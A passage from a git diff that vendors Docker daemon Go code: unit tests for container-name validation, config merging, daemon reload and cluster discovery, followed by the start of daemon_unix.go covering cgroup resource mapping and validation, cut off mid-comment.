"&sdfsfd", "safd%sd"} + validNames := []string{"word-word", "word_word", "1weoid"} + + for _, name := range invalidNames { + if validContainerNamePattern.MatchString(name) { + t.Fatalf("%q is not a valid container name and was returned as valid.", name) + } + } + + for _, name := range validNames { + if !validContainerNamePattern.MatchString(name) { + t.Fatalf("%q is a valid container name and was returned as invalid.", name) + } + } +} + +func TestContainerInitDNS(t *testing.T) { + tmp, err := ioutil.TempDir("", "docker-container-test-") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmp) + + containerID := "d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e" + containerPath := filepath.Join(tmp, containerID) + if err := os.MkdirAll(containerPath, 0755); err != nil { + t.Fatal(err) + } + + config := `{"State":{"Running":true,"Paused":false,"Restarting":false,"OOMKilled":false,"Dead":false,"Pid":2464,"ExitCode":0, +"Error":"","StartedAt":"2015-05-26T16:48:53.869308965Z","FinishedAt":"0001-01-01T00:00:00Z"}, +"ID":"d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e","Created":"2015-05-26T16:48:53.7987917Z","Path":"top", +"Args":[],"Config":{"Hostname":"d59df5276e7b","Domainname":"","User":"","Memory":0,"MemorySwap":0,"CpuShares":0,"Cpuset":"", +"AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"PortSpecs":null,"ExposedPorts":null,"Tty":true,"OpenStdin":true, +"StdinOnce":false,"Env":null,"Cmd":["top"],"Image":"ubuntu:latest","Volumes":null,"WorkingDir":"","Entrypoint":null, +"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{}},"Image":"07f8e8c5e66084bef8f848877857537ffe1c47edd01a93af27e7161672ad0e95", +"NetworkSettings":{"IPAddress":"172.17.0.1","IPPrefixLen":16,"MacAddress":"02:42:ac:11:00:01","LinkLocalIPv6Address":"fe80::42:acff:fe11:1", +"LinkLocalIPv6PrefixLen":64,"GlobalIPv6Address":"","GlobalIPv6PrefixLen":0,"Gateway":"172.17.42.1","IPv6Gateway":"","Bridge":"docker0","Ports":{}}, +"ResolvConfPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/resolv.conf", +"HostnamePath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hostname", +"HostsPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/hosts", +"LogPath":"/var/lib/docker/containers/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e/d59df5276e7b219d510fe70565e0404bc06350e0d4b43fe961f22f339980170e-json.log", +"Name":"/ubuntu","Driver":"aufs","MountLabel":"","ProcessLabel":"","AppArmorProfile":"","RestartCount":0, +"UpdateDns":false,"Volumes":{},"VolumesRW":{},"AppliedVolumesFrom":null}` + + // Container struct only used to retrieve path to config file + container := &container.Container{CommonContainer: container.CommonContainer{Root: containerPath}} + configPath, err := container.ConfigPath() + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(configPath, []byte(config), 0644); err != nil { + t.Fatal(err) + } + + hostConfig := `{"Binds":[],"ContainerIDFile":"","Memory":0,"MemorySwap":0,"CpuShares":0,"CpusetCpus":"", +"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsOptions":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null, +"Devices":[],"NetworkMode":"bridge","IpcMode":"","PidMode":"","CapAdd":null,"CapDrop":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0}, +"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":null},"CgroupParent":""}` + + hostConfigPath, err := container.HostConfigPath() + if err != nil { + t.Fatal(err) + } + if err = ioutil.WriteFile(hostConfigPath, []byte(hostConfig), 0644); err != nil { + t.Fatal(err) + } + + daemon, err := initDaemonWithVolumeStore(tmp) + if err != nil { + t.Fatal(err) + } + defer volumedrivers.Unregister(volume.DefaultDriverName) + + c, err := daemon.load(containerID) + if err != nil { + t.Fatal(err) + } + + if c.HostConfig.DNS == nil { + t.Fatal("Expected container DNS to not be nil") + } + + if c.HostConfig.DNSSearch == nil { + t.Fatal("Expected container DNSSearch to not be nil") + } + + if c.HostConfig.DNSOptions == nil { + t.Fatal("Expected container DNSOptions to not be nil") + } +} + +func newPortNoError(proto, port string) nat.Port { + p, _ := nat.NewPort(proto, port) + return p +} + +func TestMerge(t *testing.T) { + volumesImage := make(map[string]struct{}) + volumesImage["/test1"] = struct{}{} + volumesImage["/test2"] = struct{}{} + portsImage := make(nat.PortSet) + portsImage[newPortNoError("tcp", "1111")] = struct{}{} + portsImage[newPortNoError("tcp", "2222")] = struct{}{} + configImage := &containertypes.Config{ + ExposedPorts: portsImage, + Env: []string{"VAR1=1", "VAR2=2"}, + Volumes: volumesImage, + } + + portsUser := make(nat.PortSet) + portsUser[newPortNoError("tcp", "2222")] = struct{}{} + portsUser[newPortNoError("tcp", "3333")] = struct{}{} + volumesUser := make(map[string]struct{}) + volumesUser["/test3"] = struct{}{} + configUser := &containertypes.Config{ + ExposedPorts: portsUser, + Env: []string{"VAR2=3", "VAR3=3"}, + Volumes: volumesUser, + } + + if err := merge(configUser, configImage); err != nil { + t.Error(err) + } + + if len(configUser.ExposedPorts) != 3 { + t.Fatalf("Expected 3 ExposedPorts, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts)) + } + for portSpecs := range configUser.ExposedPorts { + if portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != "3333" { + t.Fatalf("Expected 1111 or 2222 or 3333, found %s", portSpecs) + } + } + if len(configUser.Env) != 3 { + t.Fatalf("Expected 3 env var, VAR1=1, VAR2=3 and VAR3=3, found %d", len(configUser.Env)) + } + for _, env := range configUser.Env { + if env != "VAR1=1" && env != "VAR2=3" && env != "VAR3=3" { + t.Fatalf("Expected VAR1=1 or VAR2=3 or VAR3=3, found %s", env) + } + } + + if len(configUser.Volumes) != 3 { + t.Fatalf("Expected 3 volumes, /test1, /test2 and /test3, found %d", len(configUser.Volumes)) + } + for v := range configUser.Volumes { + if v != "/test1" && v != "/test2" && v != "/test3" { + t.Fatalf("Expected /test1 or /test2 or /test3, found %s", v) + } + } + + ports, _, err := nat.ParsePortSpecs([]string{"0000"}) + if err != nil { + t.Error(err) + } + configImage2 := &containertypes.Config{ + ExposedPorts: ports, + } + + if err := merge(configUser, configImage2); err != nil { + t.Error(err) + } + + if len(configUser.ExposedPorts) != 4 { + t.Fatalf("Expected 4 ExposedPorts, 0000, 1111, 2222 and 3333, found %d", len(configUser.ExposedPorts)) + } + for portSpecs := range configUser.ExposedPorts { + if portSpecs.Port() != "0" && portSpecs.Port() != "1111" && portSpecs.Port() != "2222" && portSpecs.Port() != "3333" { + t.Fatalf("Expected %q or %q or %q or %q, found %s", 0, 1111, 2222, 3333, portSpecs) + } + } +} + +func TestDaemonReloadLabels(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:bar"}, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:baz"}, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } +} + +func TestDaemonReloadInsecureRegistries(t *testing.T) { + daemon := &Daemon{} + // initialize daemon with existing insecure registries: "127.0.0.0/8", "10.10.1.11:5000", "10.10.1.22:5000" + daemon.RegistryService = registry.NewService(registry.ServiceOptions{ + InsecureRegistries: []string{ + "127.0.0.0/8", + "10.10.1.11:5000", + "10.10.1.22:5000", // this will be removed when reloading + "docker1.com", + "docker2.com", // this will be removed when reloading + }, + }) + + daemon.configStore = &Config{} + + insecureRegistries := []string{ + "127.0.0.0/8", // this will be kept + "10.10.1.11:5000", // this will be kept + "10.10.1.33:5000", // this will be newly added + "docker1.com", // this will be kept + "docker3.com", // this will be newly added + } + + valuesSets := make(map[string]interface{}) + valuesSets["insecure-registries"] = insecureRegistries + + newConfig := &Config{ + CommonConfig: CommonConfig{ + ServiceOptions: registry.ServiceOptions{ + InsecureRegistries: insecureRegistries, + }, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + // After Reload, daemon.RegistryService will be changed which is useful + // for registry communication in daemon. + registries := daemon.RegistryService.ServiceConfig() + + // After Reload(), newConfig has come to registries.InsecureRegistryCIDRs and registries.IndexConfigs in daemon. + // Then collect registries.InsecureRegistryCIDRs in dataMap. + // When collecting, we need to convert CIDRS into string as a key, + // while the times of key appears as value. + dataMap := map[string]int{} + for _, value := range registries.InsecureRegistryCIDRs { + if _, ok := dataMap[value.String()]; !ok { + dataMap[value.String()] = 1 + } else { + dataMap[value.String()]++ + } + } + + for _, value := range registries.IndexConfigs { + if _, ok := dataMap[value.Name]; !ok { + dataMap[value.Name] = 1 + } else { + dataMap[value.Name]++ + } + } + + // Finally compare dataMap with the original insecureRegistries. + // Each value in insecureRegistries should appear in daemon's insecure registries, + // and each can only appear exactly ONCE. + for _, r := range insecureRegistries { + if value, ok := dataMap[r]; !ok { + t.Fatalf("Expected daemon insecure registry %s, got none", r) + } else if value != 1 { + t.Fatalf("Expected only 1 daemon insecure registry %s, got %d", r, value) + } + } + + // assert if "10.10.1.22:5000" is removed when reloading + if value, ok := dataMap["10.10.1.22:5000"]; ok { + t.Fatalf("Expected no insecure registry of 10.10.1.22:5000, got %d", value) + } + + // assert if "docker2.com" is removed when reloading + if value, ok := dataMap["docker2.com"]; ok { + t.Fatalf("Expected no insecure registry of docker2.com, got %d", value) + } +} + +func TestDaemonReloadNotAffectOthers(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:bar"}, + Debug: true, + }, + } + + valuesSets := make(map[string]interface{}) + valuesSets["labels"] = "foo:baz" + newConfig := &Config{ + CommonConfig: CommonConfig{ + Labels: []string{"foo:baz"}, + valuesSet: valuesSets, + }, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + label := daemon.configStore.Labels[0] + if label != "foo:baz" { + t.Fatalf("Expected daemon label `foo:baz`, got %s", label) + } + debug := daemon.configStore.Debug + if !debug { + t.Fatalf("Expected debug 'enabled', got 'disabled'") + } +} + +func TestDaemonDiscoveryReload(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1", + ClusterAdvertise: "127.0.0.1:3333", + }, + } + + if err := daemon.initDiscovery(daemon.configStore); err != nil { + t.Fatal(err) + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "3333"}, + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + + valuesSets := make(map[string]interface{}) + valuesSets["cluster-store"] = "memory://127.0.0.1:2222" + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSets, + }, + } + + expected = discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + ch, errCh = daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadFromEmptyDiscovery(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{} + + valuesSet := make(map[string]interface{}) + valuesSet["cluster-store"] = "memory://127.0.0.1:2222" + valuesSet["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1:2222", + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSet, + }, + } + + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-time.After(10 * time.Second): + t.Fatal("timeout waiting for discovery") + case <-daemon.discoveryWatcher.ReadyCh(): + } + + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } +} + +func TestDaemonDiscoveryReloadOnlyClusterAdvertise(t *testing.T) { + daemon := &Daemon{} + daemon.configStore = &Config{ + CommonConfig: CommonConfig{ + ClusterStore: "memory://127.0.0.1", + }, + } + valuesSets := make(map[string]interface{}) + valuesSets["cluster-advertise"] = "127.0.0.1:5555" + newConfig := &Config{ + CommonConfig: CommonConfig{ + ClusterAdvertise: "127.0.0.1:5555", + valuesSet: valuesSets, + }, + } + expected := discovery.Entries{ + &discovery.Entry{Host: "127.0.0.1", Port: "5555"}, + } + + if err := daemon.Reload(newConfig); err != nil { + t.Fatal(err) + } + + select { + case <-daemon.discoveryWatcher.ReadyCh(): + case <-time.After(10 * time.Second): + t.Fatal("Timeout waiting for discovery") + } + stopCh := make(chan struct{}) + defer close(stopCh) + ch, errCh := daemon.discoveryWatcher.Watch(stopCh) + + select { + case <-time.After(1 * time.Second): + t.Fatal("failed to get discovery advertisements in time") + case e := <-ch: + if !reflect.DeepEqual(e, expected) { + t.Fatalf("expected %v, got %v\n", expected, e) + } + case e := <-errCh: + t.Fatal(e) + } + +} diff --git a/vendor/github.com/docker/docker/daemon/daemon_unix.go b/vendor/github.com/docker/docker/daemon/daemon_unix.go new file mode 100644 index 0000000000..5b3ffeb72d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/daemon_unix.go @@ -0,0 +1,1237 @@ +// +build linux freebsd + +package daemon + +import ( + "bytes" + "fmt" + "io/ioutil" + "net" + "os" + "path/filepath" + "runtime" + "runtime/debug" + "strconv" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/blkiodev" + pblkiodev "github.com/docker/docker/api/types/blkiodev" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/container" + "github.com/docker/docker/image" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/docker/pkg/sysinfo" + "github.com/docker/docker/runconfig" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/libnetwork" + nwconfig "github.com/docker/libnetwork/config" + "github.com/docker/libnetwork/drivers/bridge" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/netutils" + "github.com/docker/libnetwork/options" + lntypes "github.com/docker/libnetwork/types" + "github.com/golang/protobuf/ptypes" + "github.com/opencontainers/runc/libcontainer/cgroups" + "github.com/opencontainers/runc/libcontainer/label" + rsystem "github.com/opencontainers/runc/libcontainer/system" + specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/pkg/errors" + "github.com/vishvananda/netlink" +) + +const ( + // See https://git.kernel.org/cgit/linux/kernel/git/tip/tip.git/tree/kernel/sched/sched.h?id=8cd9234c64c584432f6992fe944ca9e46ca8ea76#n269 + linuxMinCPUShares = 2 + linuxMaxCPUShares = 262144 + platformSupported = true + // It's not kernel limit, we want this 4M limit to supply a reasonable functional container + linuxMinMemory = 4194304 + // constants for remapped root settings + defaultIDSpecifier string = "default" + defaultRemappedID string = "dockremap" + + // constant for cgroup drivers + cgroupFsDriver = "cgroupfs" + cgroupSystemdDriver = "systemd" +) + +func getMemoryResources(config containertypes.Resources) *specs.Memory { + memory := specs.Memory{} + + if config.Memory > 0 { + limit := uint64(config.Memory) + memory.Limit = &limit + } + + if config.MemoryReservation > 0 { + reservation := uint64(config.MemoryReservation) + memory.Reservation = &reservation + } + + if config.MemorySwap != 0 { + swap := uint64(config.MemorySwap) + memory.Swap = &swap + } + + if config.MemorySwappiness != nil { + swappiness := uint64(*config.MemorySwappiness) + memory.Swappiness = &swappiness + } + + if config.KernelMemory != 0 { + kernelMemory := uint64(config.KernelMemory) + memory.Kernel = &kernelMemory + } + + return &memory +} + +func getCPUResources(config containertypes.Resources) *specs.CPU { + cpu := specs.CPU{} + + if config.CPUShares != 0 { + shares := uint64(config.CPUShares) + cpu.Shares = &shares + } + + if config.CpusetCpus != "" { + cpuset := config.CpusetCpus + cpu.Cpus = &cpuset + } + + if config.CpusetMems != "" { + cpuset := config.CpusetMems + cpu.Mems = &cpuset + } + + if config.NanoCPUs > 0 { + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + period := uint64(100 * time.Millisecond / time.Microsecond) + quota := uint64(config.NanoCPUs) * period / 1e9 + cpu.Period = &period + cpu.Quota = "a + } + + if config.CPUPeriod != 0 { + period := uint64(config.CPUPeriod) + cpu.Period = &period + } + + if config.CPUQuota != 0 { + quota := uint64(config.CPUQuota) + cpu.Quota = "a + } + + if config.CPURealtimePeriod != 0 { + period := uint64(config.CPURealtimePeriod) + cpu.RealtimePeriod = &period + } + + if config.CPURealtimeRuntime != 0 { + runtime := uint64(config.CPURealtimeRuntime) + cpu.RealtimeRuntime = &runtime + } + + return &cpu +} + +func getBlkioWeightDevices(config containertypes.Resources) ([]specs.WeightDevice, error) { + var stat syscall.Stat_t + var blkioWeightDevices []specs.WeightDevice + + for _, weightDevice := range config.BlkioWeightDevice { + if err := syscall.Stat(weightDevice.Path, &stat); err != nil { + return nil, err + } + weight := weightDevice.Weight + d := specs.WeightDevice{Weight: &weight} + d.Major = int64(stat.Rdev / 256) + d.Minor = int64(stat.Rdev % 256) + blkioWeightDevices = append(blkioWeightDevices, d) + } + + return blkioWeightDevices, nil +} + +func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error { + var ( + labelOpts []string + err error + ) + + for _, opt := range config.SecurityOpt { + if opt == "no-new-privileges" { + container.NoNewPrivileges = true + continue + } + + var con []string + if strings.Contains(opt, "=") { + con = strings.SplitN(opt, "=", 2) + } else if strings.Contains(opt, ":") { + con = strings.SplitN(opt, ":", 2) + logrus.Warn("Security options with `:` as a separator are deprecated and will be completely unsupported in 1.14, use `=` instead.") + } + + if len(con) != 2 { + return fmt.Errorf("invalid --security-opt 1: %q", opt) + } + + switch con[0] { + case "label": + labelOpts = append(labelOpts, con[1]) + case "apparmor": + container.AppArmorProfile = con[1] + case "seccomp": + container.SeccompProfile = con[1] + default: + return fmt.Errorf("invalid --security-opt 2: %q", opt) + } + } + + container.ProcessLabel, container.MountLabel, err = label.InitLabels(labelOpts) + return err +} + +func getBlkioThrottleDevices(devs []*blkiodev.ThrottleDevice) ([]specs.ThrottleDevice, error) { + var throttleDevices []specs.ThrottleDevice + var stat syscall.Stat_t + + for _, d := range devs { + if err := syscall.Stat(d.Path, &stat); err != nil { + return nil, err + } + rate := d.Rate + d := specs.ThrottleDevice{Rate: &rate} + d.Major = int64(stat.Rdev / 256) + d.Minor = int64(stat.Rdev % 256) + throttleDevices = append(throttleDevices, d) + } + + return throttleDevices, nil +} + +func checkKernel() error { + // Check for unsupported kernel versions + // FIXME: it would be cleaner to not test for specific versions, but rather + // test for specific functionalities. + // Unfortunately we can't test for the feature "does not cause a kernel panic" + // without actually causing a kernel panic, so we need this workaround until + // the circumstances of pre-3.10 crashes are clearer. + // For details see https://github.com/docker/docker/issues/407 + // Docker 1.11 and above doesn't actually run on kernels older than 3.4, + // due to containerd-shim usage of PR_SET_CHILD_SUBREAPER (introduced in 3.4). + if !kernel.CheckKernelVersion(3, 10, 0) { + v, _ := kernel.GetKernelVersion() + if os.Getenv("DOCKER_NOWARN_KERNEL_VERSION") == "" { + logrus.Fatalf("Your Linux kernel version %s is not supported for running docker. Please upgrade your kernel to 3.10.0 or newer.", v.String()) + } + } + return nil +} + +// adaptContainerSettings is called during container creation to modify any +// settings necessary in the HostConfig structure. +func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error { + if adjustCPUShares && hostConfig.CPUShares > 0 { + // Handle unsupported CPUShares + if hostConfig.CPUShares < linuxMinCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to minimum allowed of %d", hostConfig.CPUShares, linuxMinCPUShares) + hostConfig.CPUShares = linuxMinCPUShares + } else if hostConfig.CPUShares > linuxMaxCPUShares { + logrus.Warnf("Changing requested CPUShares of %d to maximum allowed of %d", hostConfig.CPUShares, linuxMaxCPUShares) + hostConfig.CPUShares = linuxMaxCPUShares + } + } + if hostConfig.Memory > 0 && hostConfig.MemorySwap == 0 { + // By default, MemorySwap is set to twice the size of Memory. + hostConfig.MemorySwap = hostConfig.Memory * 2 + } + if hostConfig.ShmSize == 0 { + hostConfig.ShmSize = container.DefaultSHMSize + } + var err error + opts, err := daemon.generateSecurityOpt(hostConfig.IpcMode, hostConfig.PidMode, hostConfig.Privileged) + if err != nil { + return err + } + hostConfig.SecurityOpt = append(hostConfig.SecurityOpt, opts...) + if hostConfig.MemorySwappiness == nil { + defaultSwappiness := int64(-1) + hostConfig.MemorySwappiness = &defaultSwappiness + } + if hostConfig.OomKillDisable == nil { + defaultOomKillDisable := false + hostConfig.OomKillDisable = &defaultOomKillDisable + } + + return nil +} + +func verifyContainerResources(resources *containertypes.Resources, sysInfo *sysinfo.SysInfo, update bool) ([]string, error) { + warnings := []string{} + + // memory subsystem checks and adjustments + if resources.Memory != 0 && resources.Memory < linuxMinMemory { + return warnings, fmt.Errorf("Minimum memory limit allowed is 4MB") + } + if resources.Memory > 0 && !sysInfo.MemoryLimit { + warnings = append(warnings, "Your kernel does not support memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + logrus.Warn("Your kernel does not support memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + resources.Memory = 0 + resources.MemorySwap = -1 + } + if resources.Memory > 0 && resources.MemorySwap != -1 && !sysInfo.SwapLimit { + warnings = append(warnings, "Your kernel does not support swap limit capabilities or the cgroup is not mounted. Memory limited without swap.") + logrus.Warn("Your kernel does not support swap limit capabilities,or the cgroup is not mounted. Memory limited without swap.") + resources.MemorySwap = -1 + } + if resources.Memory > 0 && resources.MemorySwap > 0 && resources.MemorySwap < resources.Memory { + return warnings, fmt.Errorf("Minimum memoryswap limit should be larger than memory limit, see usage") + } + if resources.Memory == 0 && resources.MemorySwap > 0 && !update { + return warnings, fmt.Errorf("You should always set the Memory limit when using Memoryswap limit, see usage") + } + if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 && !sysInfo.MemorySwappiness { + warnings = append(warnings, "Your kernel does not support memory swappiness capabilities or the cgroup is not mounted. Memory swappiness discarded.") + logrus.Warn("Your kernel does not support memory swappiness capabilities, or the cgroup is not mounted. Memory swappiness discarded.") + resources.MemorySwappiness = nil + } + if resources.MemorySwappiness != nil { + swappiness := *resources.MemorySwappiness + if swappiness < -1 || swappiness > 100 { + return warnings, fmt.Errorf("Invalid value: %v, valid memory swappiness range is 0-100", swappiness) + } + } + if resources.MemoryReservation > 0 && !sysInfo.MemoryReservation { + warnings = append(warnings, "Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. Limitation discarded.") + logrus.Warn("Your kernel does not support memory soft limit capabilities or the cgroup is not mounted. Limitation discarded.") + resources.MemoryReservation = 0 + } + if resources.MemoryReservation > 0 && resources.MemoryReservation < linuxMinMemory { + return warnings, fmt.Errorf("Minimum memory reservation allowed is 4MB") + } + if resources.Memory > 0 && resources.MemoryReservation > 0 && resources.Memory < resources.MemoryReservation { + return warnings, fmt.Errorf("Minimum memory limit can not be less than memory reservation limit, see usage") + } + if resources.KernelMemory > 0 && !sysInfo.KernelMemory { + warnings = append(warnings, "Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + logrus.Warn("Your kernel does not support kernel memory limit capabilities or the cgroup is not mounted. Limitation discarded.") + resources.KernelMemory = 0 + } + if resources.KernelMemory > 0 && resources.KernelMemory < linuxMinMemory { + return warnings, fmt.Errorf("Minimum kernel memory limit allowed is 4MB") + } + if resources.KernelMemory > 0 && !kernel.CheckKernelVersion(4, 0, 0) { + warnings = append(warnings, "You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.") + logrus.Warn("You specified a kernel memory limit on a kernel older than 4.0. Kernel memory limits are experimental on older kernels, it won't work as expected and can cause your system to be unstable.") + } + if resources.OomKillDisable != nil && !sysInfo.OomKillDisable { + // only produce warnings if the setting wasn't to *disable* the OOM Kill; no point + // warning the caller if they already wanted the feature to be off + if *resources.OomKillDisable { + warnings = append(warnings, "Your kernel does not support OomKillDisable. OomKillDisable discarded.") + logrus.Warn("Your kernel does not support OomKillDisable. OomKillDisable discarded.") + } + resources.OomKillDisable = nil + } + + if resources.PidsLimit != 0 && !sysInfo.PidsLimit { + warnings = append(warnings, "Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.") + logrus.Warn("Your kernel does not support pids limit capabilities or the cgroup is not mounted. PIDs limit discarded.") + resources.PidsLimit = 0 + } + + // cpu subsystem checks and adjustments + if resources.NanoCPUs > 0 && resources.CPUPeriod > 0 { + return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Period cannot both be set") + } + if resources.NanoCPUs > 0 && resources.CPUQuota > 0 { + return warnings, fmt.Errorf("Conflicting options: Nano CPUs and CPU Quota cannot both be set") + } + if resources.NanoCPUs > 0 && (!sysInfo.CPUCfsPeriod || !sysInfo.CPUCfsQuota) { + return warnings, fmt.Errorf("NanoCPUs can not be set, as your kernel does not support CPU cfs period/quota or the cgroup is not mounted") + } + // The highest precision we could get on Linux is 0.001, by setting + // cpu.cfs_period_us=1000ms + // cpu.cfs_quota=1ms + // See the following link for details: + // https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt + // Here we don't set the lower limit and it is up to the underlying platform (e.g., Linux) to return an error. + // The error message is 0.01 so that this is consistent with Windows + if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 { + return warnings, fmt.Errorf("Range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU()) + } + + if resources.CPUShares > 0 && !sysInfo.CPUShares { + warnings = append(warnings, "Your kernel does not support CPU shares or the cgroup is not mounted. Shares discarded.") + logrus.Warn("Your kernel does not support CPU shares or the cgroup is not mounted. Shares discarded.") + resources.CPUShares = 0 + } + if resources.CPUPeriod > 0 && !sysInfo.CPUCfsPeriod { + warnings = append(warnings, "Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.") + logrus.Warn("Your kernel does not support CPU cfs period or the cgroup is not mounted. Period discarded.") + resources.CPUPeriod = 0 + } + if resources.CPUPeriod != 0 && (resources.CPUPeriod < 1000 || resources.CPUPeriod > 1000000) { + return warnings, fmt.Errorf("CPU cfs period can not be less than 1ms (i.e. 1000) or larger than 1s (i.e. 1000000)") + } + if resources.CPUQuota > 0 && !sysInfo.CPUCfsQuota { + warnings = append(warnings, "Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.") + logrus.Warn("Your kernel does not support CPU cfs quota or the cgroup is not mounted. Quota discarded.") + resources.CPUQuota = 0 + } + if resources.CPUQuota > 0 && resources.CPUQuota < 1000 { + return warnings, fmt.Errorf("CPU cfs quota can not be less than 1ms (i.e. 1000)") + } + if resources.CPUPercent > 0 { + warnings = append(warnings, fmt.Sprintf("%s does not support CPU percent. Percent discarded.", runtime.GOOS)) + logrus.Warnf("%s does not support CPU percent. Percent discarded.", runtime.GOOS) + resources.CPUPercent = 0 + } + + // cpuset subsystem checks and adjustments + if (resources.CpusetCpus != "" || resources.CpusetMems != "") && !sysInfo.Cpuset { + warnings = append(warnings, "Your kernel does not support cpuset or the cgroup is not mounted. Cpuset discarded.") + logrus.Warn("Your kernel does not support cpuset or the cgroup is not mounted. Cpuset discarded.") + resources.CpusetCpus = "" + resources.CpusetMems = "" + } + cpusAvailable, err := sysInfo.IsCpusetCpusAvailable(resources.CpusetCpus) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset cpus", resources.CpusetCpus) + } + if !cpusAvailable { + return warnings, fmt.Errorf("Requested CPUs are not available - requested %s, available: %s", resources.CpusetCpus, sysInfo.Cpus) + } + memsAvailable, err := sysInfo.IsCpusetMemsAvailable(resources.CpusetMems) + if err != nil { + return warnings, fmt.Errorf("Invalid value %s for cpuset mems", resources.CpusetMems) + } + if !memsAvailable { + return warnings, fmt.Errorf("Requested memory nodes are not available - requested %s, available: %s", resources.CpusetMems, sysInfo.Mems) + } + + // blkio subsystem checks and 